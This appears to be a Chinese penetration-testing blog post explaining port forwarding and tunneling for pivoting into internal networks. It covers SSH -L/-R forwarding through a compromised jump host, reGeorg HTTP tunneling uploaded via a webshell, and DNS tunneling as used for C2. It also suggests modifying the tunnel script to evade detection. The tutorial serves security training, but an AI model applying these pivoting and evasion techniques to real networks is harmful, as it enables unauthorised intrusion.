<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title>内网渗透从入门到放弃-端口转发与隧道技术 | Gard3nia's Blog</title><meta name="description" content="0x01概述完成内网信息收集后，渗透测试人员需要判断流量是否出得去，进得来。隧道技术常用于在访问受限的网络环境中追踪数据流向和在非受信任的网路中实现安全的数据传输。 一般的网络通信现在两台机器之间建立TCP连接，然后进行正常的数据通信，在指导IP的情况下，可以直接发送报文；不知道IP的话，需要先进行域名解析。在实际的网络中经常会遇到一些边界设备、软硬件防火墙、入侵检测设备等检查对外连接的情况，如果"><meta name="keywords" content="Windows,内网渗透,端口转发"><meta name="author" content="Gard3nia"><meta name="copyright" content="Gard3nia"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="https://gard3nia.top/2022/03/29/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E6%94%BE%E5%BC%83-%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91%E4%B8%8E%E9%9A%A7%E9%81%93%E6%8A%80%E6%9C%AF/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="preconnect" href="//zz.bdstatic.com"/><meta name="google-site-verification" content="BFoiCjZGmn_71sWuDYx-7UEM26kH7ZsjecUFZ3_wabE"/><meta name="baidu-site-verification" content="code-QZLPYYwqlz"/><meta property="og:type" content="article"><meta property="og:title" content="内网渗透从入门到放弃-端口转发与隧道技术"><meta property="og:url" content="https://gard3nia.top/2022/03/29/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E6%94%BE%E5%BC%83-%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91%E4%B8%8E%E9%9A%A7%E9%81%93%E6%8A%80%E6%9C%AF/"><meta property="og:site_name" content="Gard3nia's Blog"><meta property="og:description" content="0x01概述完成内网信息收集后，渗透测试人员需要判断流量是否出得去，进得来。隧道技术常用于在访问受限的网络环境中追踪数据流向和在非受信任的网路中实现安全的数据传输。 一般的网络通信现在两台机器之间建立TCP连接，然后进行正常的数据通信，在指导IP的情况下，可以直接发送报文；不知道IP的话，需要先进行域名解析。在实际的网络中经常会遇到一些边界设备、软硬件防火墙、入侵检测设备等检查对外连接的情况，如果"><meta property="og:image" content="https://s2.loli.net/2022/03/30/ATLoyIlWEsXgVc4.jpg"><meta property="article:published_time" content="2022-03-29T14:11:19.000Z"><meta property="article:modified_time" content="2022-04-04T14:04:07.210Z"><meta name="twitter:card" content="summary"><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><script>var GLOBAL_CONFIG = { 
  root: '/',
  hexoversion: '5.2.0',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  bookmark: {
    message_prev: '按',
    message_next: '键将本页加入书签'
  },
  runtime: '天',
  date_suffix: {"one_hour":"刚刚","hours":"小时前","day":"天前"},
  copyright: undefined,
  ClickShowText: undefined,
  medium_zoom: false,
  fancybox: true,
  Snackbar: undefined,
  justifiedGallery: {
    js: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/js/jquery.justifiedGallery.min.js',
    css: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/css/justifiedGallery.min.css'
  },
  baiduPush: true,
  isPhotoFigcaption: false,
  islazyload: false,
  isanchor: false
};

var saveToLocal = {
  set: function setWithExpiry(key, value, ttl) {
    const now = new Date()
    const expiryDay = ttl * 86400000
    const item = {
      value: value,
      expiry: now.getTime() + expiryDay,
    }
    localStorage.setItem(key, JSON.stringify(item))
    },

  get: function getWithExpiry(key) {
    const itemStr = localStorage.getItem(key)

    if (!itemStr) {
      return undefined
    }
    const item = JSON.parse(itemStr)
    const now = new Date()

    if (now.getTime() > item.expiry) {
      localStorage.removeItem(key)
      return undefined
    }
    return item.value
  }
}</script><script id="config_change">var GLOBAL_CONFIG_SITE = { 
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isSidebar: true,
  postUpdate: '2022-04-04 22:04:07'
}</script><noscript><style type="text/css">
#nav {
  opacity: 1
}
.justified-gallery img {
  opacity: 1
}
</style></noscript><script>var activateDarkMode = function () {
  document.documentElement.setAttribute('data-theme', 'dark')
  if (document.querySelector('meta[name="theme-color"]') !== null) {
    document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
  }
}
var activateLightMode = function () {
  document.documentElement.setAttribute('data-theme', 'light')
  if (document.querySelector('meta[name="theme-color"]') !== null) {
    document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
  }
}

var autoChangeMode = 'false'
var t = saveToLocal.get('theme')
if (autoChangeMode === '1') {
  var isDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches
  var isLightMode = window.matchMedia('(prefers-color-scheme: light)').matches
  var isNotSpecified = window.matchMedia('(prefers-color-scheme: no-preference)').matches
  var hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

  if (t === undefined) {
    if (isLightMode) activateLightMode()
    else if (isDarkMode) activateDarkMode()
    else if (isNotSpecified || hasNoSupport) {
      var now = new Date()
      var hour = now.getHours()
      var isNight = hour <= 6 || hour >= 18
      isNight ? activateDarkMode() : activateLightMode()
    }
    window.matchMedia('(prefers-color-scheme: dark)').addListener(function (e) {
      if (saveToLocal.get('theme') === undefined) {
        e.matches ? activateDarkMode() : activateLightMode()
      }
    })
  } else if (t === 'light') activateLightMode()
  else activateDarkMode()
} else if (autoChangeMode === '2') {
  now = new Date()
  hour = now.getHours()
  isNight = hour <= 6 || hour >= 18
  if (t === undefined) isNight ? activateDarkMode() : activateLightMode()
  else if (t === 'light') activateLightMode()
  else activateDarkMode()
} else {
  if (t === 'dark') activateDarkMode()
  else if (t === 'light') activateLightMode()
}</script><meta name="generator" content="Hexo 5.2.0"></head><body><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" src="https://z3.ax1x.com/2021/11/13/Isj3rT.jpg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">文章</div><div class="length_num">17</div></a></div></div><div class="mobile_data_item is-center">      <div class="mobile_data_link"><a href="/tags/"><div class="headline">标签</div><div class="length_num">18</div></a></div></div><div class="mobile_data_item is-center">     <div class="mobile_data_link"><a href="/categories/"><div class="headline">分类</div><div class="length_num">8</div></a></div></div></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div></div></div><div id="body-wrap"><div id="sidebar"><i class="fas fa-arrow-right on" id="toggle-sidebar"></i><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#0x01%E6%A6%82%E8%BF%B0"><span class="toc-number">1.</span> <span class="toc-text">0x01概述</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x02%E5%88%A4%E6%96%AD%E5%86%85%E7%BD%91%E8%BF%9E%E9%80%9A%E6%80%A7"><span class="toc-number">2.</span> <span class="toc-text">0x02判断内网连通性</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x03%E5%BA%94%E7%94%A8%E5%B1%82%E9%9A%A7%E9%81%93%E6%8A%80%E6%9C%AF"><span class="toc-number">3.</span> <span class="toc-text">0x03应用层隧道技术</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#SSH%E5%8D%8F%E8%AE%AE"><span class="toc-number">3.1.</span> <span class="toc-text">SSH协议</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#SSH%E6%9C%AC%E5%9C%B0%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91"><span class="toc-number">3.1.1.</span> <span class="toc-text">SSH本地端口转发</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SSH%E8%BF%9C%E7%A8%8B%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91"><span class="toc-number">3.1.2.</span> <span class="toc-text">SSH远程端口转发</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%BD%AC%E5%8F%91%E7%A4%BA%E4%BE%8B"><span class="toc-number">3.1.3.</span> <span class="toc-text">转发示例</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%80%8E%E4%B9%88%E5%8C%BA%E5%88%86%E6%9C%AC%E5%9C%B0%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91%E5%92%8C%E8%BF%9C%E7%A8%8B%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91%EF%BC%9F"><span class="toc-number">3.1.4.</span> <span class="toc-text">怎么区分本地端口转发和远程端口转发？</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#HTTP-HTTPS%E5%8D%8F%E8%AE%AE"><span class="toc-number">3.2.</span> <span class="toc-text">HTTP&#x2F;HTTPS协议</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#reGeorg-proxychains"><span class="toc-number">3.2.1.</span> <span class="toc-text">reGeorg+proxychains</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%AE%9E%E7%8E%B0%E5%8E%9F%E7%90%86"><span class="toc-number">3.2.1.1.</span> <span class="toc-text">实现原理</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%AE%9E%E9%AA%8C%E7%A4%BA%E4%BE%8B"><span class="toc-number">3.2.1.2.</span> <span class="toc-text">实验示例</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#DNS%E5%8D%8F%E8%AE%AE"><span class="toc-number">3.3.</span> <span class="toc-text">DNS协议</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#DNS%E5%8D%8F%E8%AE%AE%E4%B8%8E%E9%9A%A7%E9%81%93"><span class="toc-number">3.3.1.</span> <span class="toc-text">DNS协议与隧道</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#DNS%E8%A7%A3%E6%9E%90%E8%AE%B0%E5%BD%95%E7%B1%BB%E5%9E%8B"><span class="toc-number">3.3.2.</span> <span class="toc-text">DNS解析记录类型</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9F%A5%E7%9C%8BDNS%E8%BF%9E%E9%80%9A%E6%80%A7"><span class="toc-number">3.3.3.</span> <span class="toc-text">查看DNS连通性</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#dnscat2"><span class="toc-number">3.3.4.</span> <span class="toc-text">dnscat2</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8%E6%96%B9%E6%B3%95"><span class="toc-number">3.3.4.1.</span> <span class="toc-text">使用方法</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x05%E4%BC%A0%E8%BE%93%E5%B1%82%E9%9A%A7%E9%81%93%E6%8A%80%E6%9C%AF"><span class="toc-number">4.</span> <span class="toc-text">0x05传输层隧道技术</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x06%E7%BD%91%E7%BB%9C%E5%B1%82%E9%9A%A7%E9%81%93%E6%8A%80%E6%9C%AF"><span class="toc-number">5.</span> <span class="toc-text">0x06网络层隧道技术</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x07%E5%8F%82%E8%80%83%E9%93%BE%E6%8E%A5"><span class="toc-number">6.</span> <span class="toc-text">0x07参考链接</span></a></li></ol></div></div></div><header class="post-bg" id="page-header" style="background-image: url(https://s2.loli.net/2022/03/30/ATLoyIlWEsXgVc4.jpg)"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">Gard3nia's Blog</a></span><span id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div><span class="close" id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></span></span></nav><div id="post-info"><div id="post-title"><div class="posttitle">内网渗透从入门到放弃-端口转发与隧道技术</div></div><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2022-03-29T14:11:19.000Z" title="发表于 2022-03-29 22:11:19">2022-03-29</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2022-04-04T14:04:07.210Z" title="更新于 2022-04-04 22:04:07">2022-04-04</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">内网渗透</a></span></div><div class="meta-secondline"> <span class="post-meta-separator">|</span><span class="post-meta-pv-cv"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div></header><main class="layout_post" id="content-inner"><article id="post"><div class="post-content" id="article-container"><h1 id="0x01概述"><a href="#0x01概述" class="headerlink" title="0x01概述"></a>0x01概述</h1><p>完成内网信息收集后，渗透测试人员需要判断流量是否出得去，进得来。隧道技术常用于在访问受限的网络环境中追踪数据流向和在非受信任的网路中实现安全的数据传输。</p>
<p>一般的网络通信现在两台机器之间建立TCP连接，然后进行正常的数据通信，在指导IP的情况下，可以直接发送报文；不知道IP的话，需要先进行域名解析。在实际的网络中经常会遇到一些边界设备、软硬件防火墙、入侵检测设备等检查对外连接的情况，如果发现异常就会对通信进行阻断。</p>
<p>隧道——就是一种绕过端口屏蔽的通信方式，防火墙两端的数据包通过防火墙所允许的协议类型或者端口进行封装，然后穿透防火墙，与对方进行通信。当被封装的数据包达到目的地后将数据包还原，并将还原后的数据包发送到相应的服务器上。</p>
<p>隧道的主要作用：穿透防火墙、加密通信流量。</p>
<p>常用隧道列举：</p>
<ul>
<li>应用层：SSH、HTTP、HTTPS、DNS。</li>
<li>传输层：TCP、UDP、常规端口转发。</li>
<li>网络层：IPv6、ICMP、GRE。</li>
</ul>
<h1 id="0x02判断内网连通性"><a href="#0x02判断内网连通性" class="headerlink" title="0x02判断内网连通性"></a>0x02判断内网连通性</h1><ol>
<li>ICMP协议（ping即可）</li>
<li>TCP协议（<code>nc -zv ip port</code>）</li>
<li>HTTP协议（<code>curl domain:port</code>）</li>
<li>DNS协议（<code>nslookup baidu.com vps-ip</code> / <code>dig @vps-ip baidu.com</code>）</li>
</ol>
<p>还有一种情况，如果流量不能直接流出，需要在内网中设置代理服务器，常见于企业内网的常见，判断方法如下：</p>
<ol>
<li>查看网络连接，判断是否存在域其他机器的 8080（不绝对）等端口的连接（ping -n 1 -a 命令）。</li>
<li>查看内网中是否有主机名为 proxy 的机器。</li>
<li>查看 IE 浏览器的直接代理。</li>
<li>检查 PAC 文件（本地/远程）。</li>
<li>借助 curl 工具进行确认（curl -x proxy-ip:port baidu.com）。</li>
</ol>
<h1 id="0x03应用层隧道技术"><a href="#0x03应用层隧道技术" class="headerlink" title="0x03应用层隧道技术"></a>0x03应用层隧道技术</h1><h2 id="SSH协议"><a href="#SSH协议" class="headerlink" title="SSH协议"></a>SSH协议</h2><p>内网中基本上所有的Linux Server和网络设备都支持SSH协议，并且在一般情况下SSH都是被防火墙放行的，所以经常被攻击者利用。再加上SSH是加密流量，所以运维大哥和主机用户基本上区分不出合法SSH会话和攻击者隧道的区别。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh user@IP</span><br></pre></td></tr></table></figure>

<p>创建SSH隧道常用参数如下：</p>
<ul>
<li>-C：压缩传输提高效率</li>
<li>-f：将SSH传输转入后台运行</li>
<li>-N：建立静默连接，连接主机后不打开shell</li>
<li>-g：允许远程主机连接本地用于转发的端口</li>
<li>-L：本地端口转发</li>
<li>-R：远程端口转发</li>
<li>-D：动态转发（socks代理）</li>
<li>-P：指定SSH端口</li>
</ul>
<h3 id="SSH本地端口转发"><a href="#SSH本地端口转发" class="headerlink" title="SSH本地端口转发"></a>SSH本地端口转发</h3><p>本地转发场景如下：假设host2为外网打点拿到的主机，host1是攻击者的公网主机，host3是内网主机。由于内网中的主机host3无法直接访问host1，但是host1和host3都可以访问host2，这时我们就可以借助host2来将host1和host3连上。</p>
<p><img src="https://s1.ax1x.com/2022/03/29/qcNm9K.png" alt="qcNm9K.png"></p>
<p>这时候就可以用上SSH本地端口转发，在host1主机上执行如下命令：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh -CfNg -L 6789:host3:3389 host2</span><br></pre></td></tr></table></figure>

<p>其中<code>-L</code>参数跟的分别为：host1的SSH绑定本地的6789端口，指定host2将所有通过6789端口的数据转发到host3的3389端口。这样的效果就是，host1访问自己的6789端口就相当于访问了host3的3389端口。</p>
<p>说的有点绕，简单概括下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh -CfNg -L X:host3:Y host2</span><br></pre></td></tr></table></figure>

<blockquote>
<p>本地端口转发是：将对于本地host1—X端口的访问，通过host2转换为，对host3—Y端口的访问.</p>
</blockquote>
<p>当然，这么做的前提就是你已经拿到了host2主机的权限，毕竟你最后还是要输入host2跳板机的口令的XD，也就是说host1为ssh客户端，host2为ssh服务端。</p>
<h3 id="SSH远程端口转发"><a href="#SSH远程端口转发" class="headerlink" title="SSH远程端口转发"></a>SSH远程端口转发</h3><p>远程转发场景如下：假设host2为外网打点拿到的主机，host1是攻击者的公网主机，host3是内网主机。内网中的主机host3无法直接访问host1，必须要借助host2来进行转发。</p>
<p>但是出现了一个问题，host1无法ssh访问host2，但是host2可以ssh访问host1，host2和host3可以互相访问，这种情况下就登录不上host2了。</p>
<p><img src="https://s1.ax1x.com/2022/03/30/q2WUYV.png" alt="q2WUYV.png"></p>
<p>所以我们要在host2上进行远程端口转发，在host2上执行如下命令：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh -CfNg -R 9876:host3:3389 host1</span><br></pre></td></tr></table></figure>

<p>其中<code>-R</code>参数跟的分别为：远程主机host1的9876端口、host1主机希望连接上的host3主机、host3主机3389端口、远程主机host1的IP。</p>
<p>这句话的进行了如下操作：让host1监听自己的9876端口，然后将所有数据经过host2转发到host3的3389端口。对于host2来说host1是一台远程主机，所以此操作被称为远程端口转发。访问host1主机9876端口的效果就相当于访问了host3的3389端口。</p>
<p>简单概括下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh -CfNg -R X:host3:Y host1</span><br></pre></td></tr></table></figure>

<blockquote>
<p>远程端口转发是：将对于远程主机host1—X端口的访问，通过本地host2转换为，对host3—Y端口的访问</p>
</blockquote>
<p>此时host2为ssh客户端，而host1为ssh服务端。</p>
<h3 id="转发示例"><a href="#转发示例" class="headerlink" title="转发示例"></a>转发示例</h3><p>首先看下拓扑：</p>
<p><img src="https://s1.ax1x.com/2022/03/07/b6gbsH.png" alt="b6gbsH.png"></p>
<p>此处</p>
<blockquote>
<p> 攻击者:192.168.150.133     安装有ssh客户端和服务端</p>
<p>Web服务器：192.168.150.143/192.168.52.143   安装有ssh客户端和服务端</p>
<p>域内主机：192.168.52.138     3389端口对内网开放</p>
</blockquote>
<p>目的是让攻击者主机可以与内网主机直接建立ssh隧道，使得攻击者可以访问3389端口</p>
<p><strong>本地转发</strong></p>
<p>在kali上执行本地端口转发，命令如下：</p>
<p><img src="https://s1.ax1x.com/2022/04/01/qfXaDA.png" alt="qfXaDA.png"></p>
<p>访问kali的6666端口即可连上内网138主机的3389端口RDP服务</p>
<p><img src="https://s1.ax1x.com/2022/04/01/qfXHv4.png" alt="qfXHv4.png"></p>
<p><strong>远程转发</strong></p>
<p>在web服务器上执行远程端口转发，命令如下：</p>
<p><img src="https://s1.ax1x.com/2022/04/01/qfL4Ln.png" alt="qfL4Ln.png"></p>
<p>访问kali的9999端口即可连上内网138主机的3389端口RDP服务</p>
<p><img src="https://s1.ax1x.com/2022/04/01/qfLci8.png" alt="qfLci8.png"></p>
<h3 id="怎么区分本地端口转发和远程端口转发？"><a href="#怎么区分本地端口转发和远程端口转发？" class="headerlink" title="怎么区分本地端口转发和远程端口转发？"></a>怎么区分本地端口转发和远程端口转发？</h3><p>简单的方法就是看SSH连接方向和应用连接方向是否一致    </p>
<p>首先，SSH 端口转发自然需要 SSH 连接，而 SSH 连接是有方向的，从 SSH Client 到 SSH Server。</p>
<p>应用也是有方向的，比如需要连接RDP 时，开启3389端口RDP服务的自然是 Server 端，我们应用连接的方向也是从应用的 Client 端连接到应用的 Server 端。</p>
<p>如果这两个连接的方向一致，那就是本地转发。而如果两个方向不一致，我们就说他是远程转发。</p>
<p>举例：</p>
<blockquote>
<p>本地转发：应用连接方向：host1-&gt;host2-&gt;host3     ssh连接方向：host1-&gt;host2      方向一致</p>
<p>远程转发：应用连接方向：host1-&gt;host2-&gt;host3     ssh连接方向：host2-&gt;host1      方向相反</p>
</blockquote>
<h2 id="HTTP-HTTPS协议"><a href="#HTTP-HTTPS协议" class="headerlink" title="HTTP/HTTPS协议"></a>HTTP/HTTPS协议</h2><p>HTTP Service代理用于将流量转发到内网，常见HTTP/HTTPS代理工具如下</p>
<blockquote>
<p>abptts,Neo-reGeorg,reGeorg,tunna,reduh…</p>
</blockquote>
<h3 id="reGeorg-proxychains"><a href="#reGeorg-proxychains" class="headerlink" title="reGeorg+proxychains"></a>reGeorg+proxychains</h3><p><a target="_blank" rel="noopener" href="https://github.com/sensepost/reGeorg">reGeorg</a> 的前身是2008年 SensePost 在 BlackHat USA 2008 的 reDuh 延伸与扩展。也是目前安全从业人员使用最多，范围最广，支持多丰富的一款 http 隧道。从本质上讲，可以将 JSP/PHP/ASP/ASPX 等脚本上传到目标服务器，在 Web 服务器堡垒机上建立 SOCKS 代理来通过 DMZ 区，将内网服务器端口的数据通过 HTTP/HTTPS 隧道转发到本机，实现 HTTP 协议的通信。reGeorg 脚本的特征非常明显，很多WAF都会对其进行查杀。</p>
<h4 id="实现原理"><a href="#实现原理" class="headerlink" title="实现原理"></a>实现原理</h4><p><img src="https://s1.ax1x.com/2022/04/03/q7dpPP.png" alt="q7dpPP.png"></p>
<p>reGeorgSocksProxy由服务端和客户端两部分组成。服务端有php、aspx、asph、jsp、node.js等多个版本，客户端则由python编写。其工作原理可简单描述为python客户端在本地监听一个端口，提供socks服务，并将数据通过http/https协议发送到服务端上，并从服务端上用socket实现转发。具体流程：</p>
<ul>
<li>客户端在本地启动，用<code>bind()</code>方法绑定-l和-p参数传入的本地地址和端口</li>
<li>客户端监听的地址有连接传入时，开启一个新线程，实例化<code>session</code>类，并在新线程里由<code>handleSocks()</code>方法对socks协议版本进行判断并调用相应的解析方法(<code>parseSocks4()</code>和<code>parseSocks5()</code>)</li>
<li>客户端从数据中解析出目标地址和目标端口，由<code>setupRemoteSession()</code>方法与服务端进行通讯，在服务端建立新的session并创建socket对象，连接到目标主机，最后将实例化后的socket对象保存到当前session，由Set-Cookie头返回sessionid</li>
<li>客户端在<code>setupRemoteSession()</code>方法返回后，保存保存sessionid到当前线程，后续由<code>writer()</code>和<code>reader()</code>方法以sessionid为标识，实现每个连接的数据交互</li>
<li>交互完成后，客户端调用<code>closeRemoteSession()</code>方法，通知服务端关闭远程链接并销毁session</li>
</ul>
<p>其中reGeorgSocksProxy的交互命令通过HTTP Headers发送，socks代理数据通过HTTP Body发送。</p>
<h4 id="实验示例"><a href="#实验示例" class="headerlink" title="实验示例"></a>实验示例</h4><p>利用拿到的webshell向DMZ区跳板机上传刚刚生成的<code>tunnel.nosocket.php(aspx|ashx|jsp)</code>脚本</p>
<p><img src="https://s1.ax1x.com/2022/04/03/q7QVED.png" alt="q7QVED.png"></p>
<p>访问成功如下图所示</p>
<p><img src="https://s1.ax1x.com/2022/04/03/q7QoVO.png" alt="q7QoVO.png">在攻击主机kali上启动reGeorgSocksProxy.py文件，选择bind本地9091端口</p>
<p><img src="https://s1.ax1x.com/2022/04/03/q71iTO.png" alt="q71iTO.png"></p>
<p>修改proxychains的socks代理端口为9091</p>
<p><img src="https://s1.ax1x.com/2022/04/03/q71Q78.png" alt="q71Q78.png"></p>
<p>通过proxychains启动RDP连接内网的域控机器</p>
<p><img src="https://s1.ax1x.com/2022/04/03/q73qG4.png" alt="q73qG4.png"></p>
<p>主要是作为server端的php文件太大，很容易被识别查杀，需要自己改造一下才会有更好的效果。</p>
<h2 id="DNS协议"><a href="#DNS协议" class="headerlink" title="DNS协议"></a>DNS协议</h2><h3 id="DNS协议与隧道"><a href="#DNS协议与隧道" class="headerlink" title="DNS协议与隧道"></a>DNS协议与隧道</h3><p>DNS 协议是一种请求/应答协议，也是一种可用于应用层的隧道技术。虽然激增的 DNS 流量可能会被发现，但是基于传统的 Socket 隧道已濒临淘汰，以及 TCP 、UDP 通信大量被防御系统拦截的状况，DNS、ICMP、HTTP(S) 等难以被禁用的协议已成为攻击者控制隧道的主流渠道。</p>
<p>DNS是个很常见的服务，且DNS报文本身具备穿透防火墙的功能，防火墙和入侵检测设备大都不会过滤DNS流量，为DNS成为隐藏隧道创造了条件。所以DNS隧道在僵尸网络和APT攻击中扮演着重要的角色。</p>
<p>用于管理僵尸网络和进行APT攻击的服务器被叫做<strong>C2服务器（Command&amp;Control）</strong>C2节点分为两种，分别是C2的服务端和客户端，服务端即攻击者服务器，客户端为被控受害机。C2通信指的是植入C2客户端木马或者后门与C2服务端上的远控之间的通信。</p>
<p>DNS隧道的工作原理：在进行DNS查询时，如果查询的域名不在DNS服务器的本地缓存中，DNS服务器就会访问互联网进行查询，然后返回结果。如果互联网上有一台服务器依靠DNS协议即可进行数据包交换。从DNS协议角度来看，这样的操作只是在一次次查询某个域名并得到解析结果，预期返回的结果应该是一个IP地址，但是返回结果可以是任意字符串，包括<strong>加密的C2指令</strong>。</p>
<p><img src="https://s1.ax1x.com/2022/04/03/qHM2LV.png" alt="qHM2LV.png"></p>
<p>上图是经典的域名型DNS隧道木马的通信架构，使用 DNS 隧道与外界进行通信时，从表面上看是没有接连外网的（内网网关没有转发 IP 数据包），但实际上，内网的 DNS 服务器进行了中转操作。这就是 DNS 隧道的工作原理，简单来说就是将其他协议封装在 DNS 协议中进行传输。</p>
<h3 id="DNS解析记录类型"><a href="#DNS解析记录类型" class="headerlink" title="DNS解析记录类型"></a>DNS解析记录类型</h3><p><strong>A</strong></p>
<p>地址记录，将域名指向一个IPv4地址，如果需要将域名指向一个IP地址，就需要添加A记录。</p>
<p><strong>CNAME</strong></p>
<p>如果需要将域名指向另一个域名，再由另一个域名提供ip地址，就需要添加CNAME记录。CNAME将域名指向另一个域名。</p>
<p><strong>TXT</strong></p>
<p>文本长度限制512，通常做SPF记录（反垃圾邮件）</p>
<p><strong>NS</strong></p>
<p>域名服务器记录，将域名指定其他DNS服务器解析。如果需要把子域名交给其他DNS服务商解析，就需要添加NS记录。用来表明由哪台服务器对该域名进行解析。</p>
<p><strong>AAAA</strong></p>
<p>同A记录，将域名指向一个IPv6地址，用来指定主机名（或域名）对应的IPv6地址（例如：ff06:0:0:0:0:0:0:c3）记录。</p>
<p><strong>MX</strong></p>
